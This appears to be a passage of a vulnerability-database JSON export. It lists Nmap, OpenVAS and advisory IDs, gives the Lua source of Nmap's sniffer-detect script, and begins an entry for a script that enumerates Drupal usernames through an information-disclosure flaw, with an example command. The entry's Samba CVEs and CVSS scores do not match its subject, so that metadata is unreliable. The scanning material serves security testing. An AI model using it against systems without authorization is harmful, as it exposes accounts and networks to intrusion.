"NMAP:PCANYWHERE-BRUTE.NSE", "NMAP:PCWORX-INFO.NSE", "NMAP:PGSQL-BRUTE.NSE", "NMAP:PJL-READY-MESSAGE.NSE", "NMAP:POP3-BRUTE.NSE", "NMAP:POP3-CAPABILITIES.NSE", "NMAP:POP3-NTLM-INFO.NSE", "NMAP:PORT-STATES.NSE", "NMAP:PPTP-VERSION.NSE", "NMAP:PUPPET-NAIVESIGNING.NSE", "NMAP:QCONN-EXEC.NSE", "NMAP:QSCAN.NSE", "NMAP:QUAKE1-INFO.NSE", "NMAP:QUAKE3-INFO.NSE", "NMAP:QUAKE3-MASTER-GETSERVERS.NSE", "NMAP:RDP-ENUM-ENCRYPTION.NSE", "NMAP:RDP-NTLM-INFO.NSE", "NMAP:RDP-VULN-MS12-020.NSE", "NMAP:REALVNC-AUTH-BYPASS.NSE", "NMAP:REDIS-BRUTE.NSE", "NMAP:REDIS-INFO.NSE", "NMAP:RESOLVEALL.NSE", "NMAP:REVERSE-INDEX.NSE", "NMAP:REXEC-BRUTE.NSE", "NMAP:RFC868-TIME.NSE", "NMAP:RIAK-HTTP-INFO.NSE", 
"NMAP:RLOGIN-BRUTE.NSE", "NMAP:RMI-DUMPREGISTRY.NSE", "NMAP:RMI-VULN-CLASSLOADER.NSE", "NMAP:RPC-GRIND.NSE", "NMAP:RPCAP-BRUTE.NSE", "NMAP:RPCAP-INFO.NSE", "NMAP:RPCINFO.NSE", "NMAP:RSA-VULN-ROCA.NSE", "NMAP:RSYNC-BRUTE.NSE", "NMAP:RSYNC-LIST-MODULES.NSE", "NMAP:RTSP-METHODS.NSE", "NMAP:RTSP-URL-BRUTE.NSE", "NMAP:RUSERS.NSE", "NMAP:S7-INFO.NSE", "NMAP:SAMBA-VULN-CVE-2012-1182.NSE", "NMAP:SERVICETAGS.NSE", "NMAP:SHODAN-API.NSE", "NMAP:SIP-BRUTE.NSE", "NMAP:SIP-CALL-SPOOF.NSE", "NMAP:SIP-ENUM-USERS.NSE", "NMAP:SIP-METHODS.NSE", "NMAP:SKYPEV2-VERSION.NSE", "NMAP:SMB-BRUTE.NSE", "NMAP:SMB-DOUBLE-PULSAR-BACKDOOR.NSE", "NMAP:SMB-ENUM-DOMAINS.NSE", "NMAP:SMB-ENUM-GROUPS.NSE", "NMAP:SMB-ENUM-PROCESSES.NSE", "NMAP:SMB-ENUM-SERVICES.NSE", "NMAP:SMB-ENUM-SESSIONS.NSE", "NMAP:SMB-ENUM-SHARES.NSE", "NMAP:SMB-ENUM-USERS.NSE", "NMAP:SMB-FLOOD.NSE", "NMAP:SMB-LS.NSE", "NMAP:SMB-MBENUM.NSE", "NMAP:SMB-OS-DISCOVERY.NSE", "NMAP:SMB-PRINT-TEXT.NSE", "NMAP:SMB-PROTOCOLS.NSE", "NMAP:SMB-PSEXEC.NSE", "NMAP:SMB-SECURITY-MODE.NSE", "NMAP:SMB-SERVER-STATS.NSE", "NMAP:SMB-SYSTEM-INFO.NSE", "NMAP:SMB-VULN-CONFICKER.NSE", "NMAP:SMB-VULN-CVE-2017-7494.NSE", "NMAP:SMB-VULN-CVE2009-3103.NSE", "NMAP:SMB-VULN-MS06-025.NSE", "NMAP:SMB-VULN-MS07-029.NSE", "NMAP:SMB-VULN-MS08-067.NSE", "NMAP:SMB-VULN-MS10-054.NSE", "NMAP:SMB-VULN-MS10-061.NSE", "NMAP:SMB-VULN-MS17-010.NSE", "NMAP:SMB-VULN-REGSVC-DOS.NSE", "NMAP:SMB-VULN-WEBEXEC.NSE", "NMAP:SMB-WEBEXEC-EXPLOIT.NSE", "NMAP:SMB2-CAPABILITIES.NSE", "NMAP:SMB2-SECURITY-MODE.NSE", "NMAP:SMB2-TIME.NSE", "NMAP:SMB2-VULN-UPTIME.NSE", "NMAP:SMTP-BRUTE.NSE", "NMAP:SMTP-COMMANDS.NSE", "NMAP:SMTP-ENUM-USERS.NSE", "NMAP:SMTP-NTLM-INFO.NSE", "NMAP:SMTP-OPEN-RELAY.NSE", "NMAP:SMTP-STRANGEPORT.NSE", "NMAP:SMTP-VULN-CVE2010-4344.NSE", "NMAP:SMTP-VULN-CVE2011-1720.NSE", "NMAP:SMTP-VULN-CVE2011-1764.NSE", "NMAP:SNMP-BRUTE.NSE", "NMAP:SNMP-HH3C-LOGINS.NSE", "NMAP:SNMP-INFO.NSE", "NMAP:SNMP-INTERFACES.NSE", "NMAP:SNMP-IOS-CONFIG.NSE", "NMAP:SNMP-NETSTAT.NSE", 
"NMAP:SNMP-PROCESSES.NSE", "NMAP:SNMP-SYSDESCR.NSE", "NMAP:SNMP-WIN32-SERVICES.NSE", "NMAP:SNMP-WIN32-SHARES.NSE", "NMAP:SNMP-WIN32-SOFTWARE.NSE", "NMAP:SNMP-WIN32-USERS.NSE", "NMAP:SOCKS-AUTH-INFO.NSE", "NMAP:SOCKS-BRUTE.NSE", "NMAP:SOCKS-OPEN-PROXY.NSE", "NMAP:SSH-AUTH-METHODS.NSE", "NMAP:SSH-BRUTE.NSE", "NMAP:SSH-HOSTKEY.NSE", "NMAP:SSH-PUBLICKEY-ACCEPTANCE.NSE", "NMAP:SSH-RUN.NSE", "NMAP:SSH2-ENUM-ALGOS.NSE", "NMAP:SSHV1.NSE", "NMAP:SSL-CCS-INJECTION.NSE", "NMAP:SSL-CERT-INTADDR.NSE", "NMAP:SSL-CERT.NSE", "NMAP:SSL-DATE.NSE", "NMAP:SSL-DH-PARAMS.NSE", "NMAP:SSL-ENUM-CIPHERS.NSE", "NMAP:SSL-HEARTBLEED.NSE", "NMAP:SSL-KNOWN-KEY.NSE", "NMAP:SSL-POODLE.NSE", "NMAP:SSLV2-DROWN.NSE", "NMAP:SSLV2.NSE", "NMAP:SSTP-DISCOVER.NSE", "NMAP:STUN-INFO.NSE", "NMAP:STUN-VERSION.NSE", "NMAP:STUXNET-DETECT.NSE", "NMAP:SUPERMICRO-IPMI-CONF.NSE", "NMAP:SVN-BRUTE.NSE", "NMAP:TARGETS-ASN.NSE", "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "NMAP:TARGETS-IPV6-MULTICAST-ECHO.NSE", "NMAP:TARGETS-IPV6-MULTICAST-INVALID-DST.NSE", "NMAP:TARGETS-IPV6-MULTICAST-MLD.NSE", "NMAP:TARGETS-IPV6-MULTICAST-SLAAC.NSE", "NMAP:TARGETS-IPV6-WORDLIST.NSE", "NMAP:TARGETS-SNIFFER.NSE", "NMAP:TARGETS-TRACEROUTE.NSE", "NMAP:TARGETS-XML.NSE", "NMAP:TEAMSPEAK2-VERSION.NSE", "NMAP:TELNET-BRUTE.NSE", "NMAP:TELNET-ENCRYPTION.NSE", "NMAP:TELNET-NTLM-INFO.NSE", "NMAP:TFTP-ENUM.NSE", "NMAP:TLS-ALPN.NSE", "NMAP:TLS-NEXTPROTONEG.NSE", "NMAP:TLS-TICKETBLEED.NSE", "NMAP:TN3270-SCREEN.NSE", "NMAP:TOR-CONSENSUS-CHECKER.NSE", "NMAP:TRACEROUTE-GEOLOCATION.NSE", "NMAP:TSO-BRUTE.NSE", "NMAP:TSO-ENUM.NSE", "NMAP:UBIQUITI-DISCOVERY.NSE", "NMAP:UNITTEST.NSE", "NMAP:UNUSUAL-PORT.NSE", "NMAP:UPNP-INFO.NSE", "NMAP:UPTIME-AGENT-INFO.NSE", "NMAP:URL-SNARF.NSE", "NMAP:VENTRILO-INFO.NSE", "NMAP:VERSANT-INFO.NSE", "NMAP:VMAUTHD-BRUTE.NSE", "NMAP:VMWARE-VERSION.NSE", "NMAP:VNC-BRUTE.NSE", "NMAP:VNC-INFO.NSE", "NMAP:VNC-TITLE.NSE", "NMAP:VOLDEMORT-INFO.NSE", "NMAP:VTAM-ENUM.NSE", "NMAP:VULNERS.NSE", "NMAP:VUZE-DHT-INFO.NSE", "NMAP:WDB-VERSION.NSE", 
"NMAP:WEBLOGIC-T3-INFO.NSE", "NMAP:WHOIS-DOMAIN.NSE", "NMAP:WHOIS-IP.NSE", "NMAP:WSDD-DISCOVER.NSE", "NMAP:X11-ACCESS.NSE", "NMAP:XDMCP-DISCOVER.NSE", "NMAP:XMLRPC-METHODS.NSE", "NMAP:XMPP-BRUTE.NSE", "NMAP:XMPP-INFO.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123690", "OPENVAS:1361412562310123695", "OPENVAS:1361412562310123940", "OPENVAS:1361412562310123943", "OPENVAS:1361412562310703860", "OPENVAS:136141256231071254", "OPENVAS:136141256231071279", "OPENVAS:136141256231071548", "OPENVAS:1361412562310802794", "OPENVAS:1361412562310811055", "OPENVAS:1361412562310831574", "OPENVAS:1361412562310840980", "OPENVAS:1361412562310843180", "OPENVAS:1361412562310850203", "OPENVAS:1361412562310850289", "OPENVAS:1361412562310851557", "OPENVAS:1361412562310851559", "OPENVAS:1361412562310864158", "OPENVAS:1361412562310864174", "OPENVAS:1361412562310864200", "OPENVAS:1361412562310864205", "OPENVAS:1361412562310864213", "OPENVAS:1361412562310864238", "OPENVAS:1361412562310864306", "OPENVAS:1361412562310865323", "OPENVAS:1361412562310865347", "OPENVAS:1361412562310870581", "OPENVAS:1361412562310870584", "OPENVAS:1361412562310870928", "OPENVAS:1361412562310870935", "OPENVAS:1361412562310871821", "OPENVAS:1361412562310871822", "OPENVAS:1361412562310872718", "OPENVAS:1361412562310872719", "OPENVAS:1361412562310881179", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310881228", "OPENVAS:1361412562310881650", "OPENVAS:1361412562310881654", "OPENVAS:1361412562310881680", "OPENVAS:1361412562310882723", "OPENVAS:1361412562310882724", "OPENVAS:1361412562310882726", "OPENVAS:1361412562310890951", "OPENVAS:1361412562311220171104", "OPENVAS:1361412562311220171105", "OPENVAS:703860", "OPENVAS:71254", "OPENVAS:71279", "OPENVAS:71548", "OPENVAS:802794", "OPENVAS:831574", "OPENVAS:840980", "OPENVAS:850203", "OPENVAS:850289", "OPENVAS:864158", "OPENVAS:864174", "OPENVAS:864200", "OPENVAS:864205", "OPENVAS:864213", "OPENVAS:864238", "OPENVAS:864306", "OPENVAS:865323", 
"OPENVAS:865347", "OPENVAS:870581", "OPENVAS:870584", "OPENVAS:870928", "OPENVAS:870935", "OPENVAS:881179", "OPENVAS:881194", "OPENVAS:881228", "OPENVAS:881650", "OPENVAS:881654", "OPENVAS:881680"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0465", "ELSA-2012-0466", "ELSA-2012-0478", "ELSA-2013-0506", "ELSA-2013-0515", "ELSA-2017-1270", "ELSA-2017-1271", "ELSA-2017-1272", "ELSA-2017-1950", "ELSA-2018-1860"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116843", "PACKETSTORM:116953", "PACKETSTORM:142657", "PACKETSTORM:142715", "PACKETSTORM:142782"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "RAPID7COMMUNITY:41DCA564C1D56E5188C09BCC956BC029", "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "redhat", "idList": ["RHSA-2012:0465", "RHSA-2012:0466", "RHSA-2012:0478", "RHSA-2013:0506", "RHSA-2013:0515", "RHSA-2017:1270", "RHSA-2017:1271", "RHSA-2017:1272", "RHSA-2017:1273", "RHSA-2017:1390"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7494"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42", "SAINT:6FE788CBA26F517C02B44A699047593B", "SAINT:C50A339EFD5B2F96051BC00F96014CAA"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182", "SAMBA:CVE-2017-7494"]}, {"type": "securelist", "idList": ["SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28165", "SECURITYVULNS:VULN:12328", "SECURITYVULNS:VULN:12426", "SECURITYVULNS:VULN:12518"]}, {"type": "seebug", "idList": ["SSV:60050", "SSV:93139"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0507-1", "OPENSUSE-SU-2012:0508-1", "OPENSUSE-SU-2017:1401-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2012:0500-1", "SUSE-SU-2012:0501-1", "SUSE-SU-2012:0501-2", "SUSE-SU-2012:0502-1", "SUSE-SU-2012:0504-1", 
"SUSE-SU-2012:0515-1", "SUSE-SU-2017:1391-1", "SUSE-SU-2017:1392-1", "SUSE-SU-2017:1393-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "thn", "idList": ["THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:590A2A4F40D408F427266EBA5EE7B530", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:9DF1743B35B2E69D4835136091D08EAD", "THN:B1F7A116FFB321FFB433B2511F0594AA"]}, {"type": "threatpost", "idList": ["THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747"]}, {"type": "ubuntu", "idList": ["USN-1423-1", "USN-3296-1", "USN-3296-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-1182", "UB:CVE-2017-7494"]}, {"type": "zdi", "idList": ["ZDI-12-061", "ZDI-12-062", "ZDI-12-063", "ZDI-12-064", "ZDI-12-068", "ZDI-12-069", "ZDI-12-070", "ZDI-12-071", "ZDI-12-072"]}, {"type": "zdt", "idList": ["1337DAY-ID-27836", "1337DAY-ID-27859"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-834"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "canvas", "idList": ["SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "centos", "idList": ["CESA-2017:1270", "CESA-2017:1271"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0444"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "cve", "idList": ["CVE-2012-1182", "CVE-2017-7494"]}, {"type": "debian", "idList": ["DEBIAN:DLA-951-1:1BAA2", "DEBIAN:DSA-3860-1:8B793"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-7494"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}, {"type": "f5", "idList": ["F5:K13551136", "SOL13719"]}, {"type": 
"fedora", "idList": ["FEDORA:0B8006061CC2", "FEDORA:219F3605E539", "FEDORA:79D7720B02", "FEDORA:BC7B0601FC16"]}, {"type": "fireeye", "idList": ["FIREEYE:DC498F7CA24681C582F008B675092B7D"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201805-07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170613-01-SAMBA", "HUAWEI-SA-20171129-01-SAMBA"]}, {"type": "ibm", "idList": ["82248DC9C1F555BF98367B4387954D2C23BFE20908CE565E0127C6A3FC16193E", "CE6756539D503C94C0FE819367133FAF5CF98E845923A4230C5E49923B068701"]}, {"type": "ics", "idList": ["ICSA-17-180-02"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786440", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786995"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-834.NASL", "CENTOS_RHSA-2017-1270.NASL", "CENTOS_RHSA-2017-1271.NASL", "DEBIAN_DLA-951.NASL", "DEBIAN_DSA-3860.NASL", "EULEROS_SA-2017-1104.NASL", "EULEROS_SA-2017-1105.NASL", "FEDORA_2017-570C0071C4.NASL", "FEDORA_2017-642A0ECA75.NASL", "FREEBSD_PKG_6F4D96C0406211E7B291B499BAEBFEAF.NASL", "OPENSUSE-2017-613.NASL", "OPENSUSE-2017-618.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1271.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "REDHAT-RHSA-2013-0515.NASL", "REDHAT-RHSA-2017-1270.NASL", "REDHAT-RHSA-2017-1271.NASL", "REDHAT-RHSA-2017-1272.NASL", "REDHAT-RHSA-2017-1273.NASL", "REDHAT-RHSA-2017-1390.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA_ON_SL6_X.NASL", "SUSE_SU-2017-1391-1.NASL", "SUSE_SU-2017-1392-1.NASL", "SUSE_SU-2017-1393-1.NASL", "SUSE_SU-2017-1396-1.NASL", "UBUNTU_USN-3296-1.NASL", "UBUNTU_USN-3296-2.NASL"]}, {"type": "nmap", "idList": ["NMAP:AJP-HEADERS.NSE", "NMAP:AUTH-OWNERS.NSE", 
"NMAP:BROADCAST-DNS-SERVICE-DISCOVERY.NSE", "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "NMAP:CICS-INFO.NSE", "NMAP:CITRIX-ENUM-SERVERS.NSE", "NMAP:CLAMAV-EXEC.NSE", "NMAP:COUCHDB-DATABASES.NSE", "NMAP:DAYTIME.NSE", "NMAP:DNS-CACHE-SNOOP.NSE", "NMAP:FTP-SYST.NSE", "NMAP:HADOOP-TASKTRACKER-INFO.NSE", "NMAP:HDDTEMP-INFO.NSE", "NMAP:HTTP-ADOBE-COLDFUSION-APSA1301.NSE", "NMAP:HTTP-APACHE-SERVER-STATUS.NSE", "NMAP:HTTP-GENERATOR.NSE", "NMAP:HTTP-INTERNAL-IP-DISCLOSURE.NSE", "NMAP:HTTP-NTLM-INFO.NSE", "NMAP:MS-SQL-XP-CMDSHELL.NSE", "NMAP:MYSQL-VARIABLES.NSE", "NMAP:NAT-PMP-INFO.NSE", "NMAP:ORACLE-ENUM-USERS.NSE", "NMAP:POP3-NTLM-INFO.NSE", "NMAP:RFC868-TIME.NSE", "NMAP:RPC-GRIND.NSE", "NMAP:S7-INFO.NSE", "NMAP:SSH-PUBLICKEY-ACCEPTANCE.NSE", "NMAP:SSH-RUN.NSE", "NMAP:SSL-DH-PARAMS.NSE", "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "NMAP:TARGETS-IPV6-MULTICAST-INVALID-DST.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123690", "OPENVAS:136141256231014259", "OPENVAS:1361412562310881179", "OPENVAS:1361412562310890951", "OPENVAS:864174", "OPENVAS:864213", "OPENVAS:865347"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1270", "ELSA-2017-1271", "ELSA-2017-1272"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142657", "PACKETSTORM:142715", "PACKETSTORM:142782"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "redhat", "idList": ["RHSA-2017:1271"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7494"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42", "SAINT:C50A339EFD5B2F96051BC00F96014CAA"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182"]}, {"type": "securelist", "idList": ["SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12426"]}, {"type": "seebug", 
"idList": ["SSV:93139"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1401-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2017:1391-1", "SUSE-SU-2017:1392-1", "SUSE-SU-2017:1393-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "thn", "idList": ["THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:590A2A4F40D408F427266EBA5EE7B530", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:9DF1743B35B2E69D4835136091D08EAD", "THN:B1F7A116FFB321FFB433B2511F0594AA"]}, {"type": "threatpost", "idList": ["THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747"]}, {"type": "ubuntu", "idList": ["USN-3296-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-7494"]}, {"type": "zdi", "idList": ["ZDI-12-062"]}, {"type": "zdt", "idList": ["1337DAY-ID-27836"]}]}, "exploitation": null, "vulnersScore": 6.4}, "_state": {"dependencies": 1647589307, "score": 0}, "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks if a target on a local Ethernet has its network card in promiscuous mode.\n\nThe techniques used are described at\nhttp://www.securityfriday.com/promiscuous_detection_01.pdf.\n]]\n\n---\n-- @output\n-- Host script results:\n-- |_ sniffer-detect: Likely in promiscuous mode (tests: \"11111111\")\n\n\nauthor = \"Marek Majkowski\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"intrusive\"}\n\n-- okay, we're interested only in hosts that are on our ethernet lan\nhostrule = function(host)\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n if host.directly_connected == true and\n host.mac_addr ~= nil and\n host.mac_addr_src ~= nil and\n host.interface ~= nil then\n local iface = 
nmap.get_interface_info(host.interface)\n if iface and iface.link == 'ethernet' then\n return true\n end\n end\n return false\nend\n\nlocal function check (layer2)\n return string.sub(layer2, 0, 12)\nend\n\n\ndo_test = function(dnet, pcap, host, test)\n local status, length, layer2, layer3\n local i = 0\n\n -- ARP requests are send with timeouts: 10ms, 40ms, 90ms\n -- before each try, we wait at least 100ms\n -- in summary, this test takes at least 100ms and at most 440ms\n for i=1,3 do\n -- flush buffers :), wait quite long.\n repeat\n pcap:set_timeout(100)\n local test = host.mac_addr_src .. host.mac_addr\n status, length, layer2, layer3 = pcap:pcap_receive()\n while status and test ~= check(layer2) do\n status, length, layer2, layer3 = pcap:pcap_receive()\n end\n until status ~= true\n pcap:set_timeout(10 * i*i)\n\n dnet:ethernet_send(test)\n\n local test = host.mac_addr_src .. host.mac_addr\n status, length, layer2, layer3 = pcap:pcap_receive()\n while status and test ~= check(layer2) do\n status, length, layer2, layer3 = pcap:pcap_receive()\n end\n if status == true then\n -- the basic idea, was to inform user about time, when we got packet\n -- so that 1 would mean (0-10ms), 2=(10-40ms) and 3=(40ms-90ms)\n -- but when we're running this tests on macs, first test is always 2.\n -- which means that the first answer is dropped.\n -- for now, just return 1 if test was successful, it's easier\n -- return(i)\n return(1)\n end\n end\n return('_')\nend\n\naction = function(host)\n local dnet = nmap.new_dnet()\n local pcap = nmap.new_socket()\n local _\n local status\n local results = {\n ['1_____1_'] = false, -- MacOSX(Tiger.Panther)/Linux/ ?Win98/ WinXP sp2(no pcap)\n ['1_______'] = false, -- Old Apple/SunOS/3Com\n ['1___1_1_'] = false, -- MacOSX(Tiger)\n ['11111111'] = true, -- BSD/Linux/OSX/ (or not promiscuous openwrt )\n ['1_1___1_'] = false, -- WinXP sp2 + pcap|| win98 sniff || win2k sniff (see below)\n ['111___1_'] = true, -- WinXP sp2 promisc\n --['1111__1_'] 
= true, -- ?Win98 promisc + ??win98 no promisc *not confirmed*\n }\n dnet:ethernet_open(host.interface)\n\n pcap:pcap_open(host.interface, 64, false, \"arp\")\n\n local test_static = host.mac_addr_src ..\n \"\\x08\\x06\\x00\\x01\\x08\\x00\\x06\\x04\\x00\\x01\" ..\n host.mac_addr_src ..\n host.bin_ip_src ..\n \"\\x00\\x00\\x00\\x00\\x00\\x00\" ..\n host.bin_ip\n local t = {\n \"\\xff\\xff\\xff\\xff\\xff\\xff\", -- B32 no meaning?\n \"\\xff\\xff\\xff\\xff\\xff\\xfe\", -- B31\n \"\\xff\\xff\\x00\\x00\\x00\\x00\", -- B16\n \"\\xff\\x00\\x00\\x00\\x00\\x00\", -- B8\n \"\\x01\\x00\\x00\\x00\\x00\\x00\", -- G\n \"\\x01\\x00\\x5e\\x00\\x00\\x00\", -- M0\n \"\\x01\\x00\\x5e\\x00\\x00\\x01\", -- M1 no meaning?\n \"\\x01\\x00\\x5e\\x00\\x00\\x03\", -- M3\n }\n local v\n local out = {}\n for _, v in ipairs(t) do\n out[#out+1] = do_test(dnet, pcap, host, v .. test_static)\n end\n out = table.concat(out)\n\n dnet:ethernet_close()\n pcap:pcap_close()\n\n if out == '1_1___1_' then\n return 'Windows with libpcap installed; may or may not be sniffing (tests: \"' .. out .. '\")'\n end\n if results[out] == false then\n -- probably not sniffing\n return\n end\n if results[out] == true then\n -- rather sniffer.\n return 'Likely in promiscuous mode (tests: \"' .. out .. '\")'\n end\n\n -- results[out] == nil\n return 'Unknown (tests: \"' .. out .. '\")'\nend\n", "nmap": {"scriptType": "hostrule", "categories": ["discovery", "intrusive"]}}
{"nmap": [{"lastseen": "2022-02-15T21:44:04", "description": "Enumerates Drupal users by exploiting an information disclosure vulnerability in Views, Drupal's most popular module. \n\nRequests to admin/views/ajax/autocomplete/user/STRING return all usernames that begin with STRING. The script works by iterating STRING over letters to extract all usernames. \n\nFor more information,see: \n\n * <http://www.madirish.net/node/465>\n\n### See also:\n\n * [ http-vuln-cve2014-3704.nse ](<../scripts/http-vuln-cve2014-3704.html>)\n\n## Script Arguments \n\n#### http-drupal-enum-users.root \n\nbase path. Defaults to \"/\"\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script=http-drupal-enum-users --script-args http-drupal-enum-users.root=\"/path/\" <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-drupal-enum-users:\n | admin\n | alex\n | manager\n |_ user\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [json](<../lib/json.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-22T00:09:28", "type": "nmap", "title": "http-drupal-enum-users NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-01-23T20:37:22", "id": "NMAP:HTTP-DRUPAL-ENUM-USERS.NSE", "href": "https://nmap.org/nsedoc/scripts/http-drupal-enum-users.html", "sourceData": "local http = require \"http\"\nlocal json = require \"json\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nEnumerates Drupal users by exploiting an information disclosure vulnerability\nin Views, 
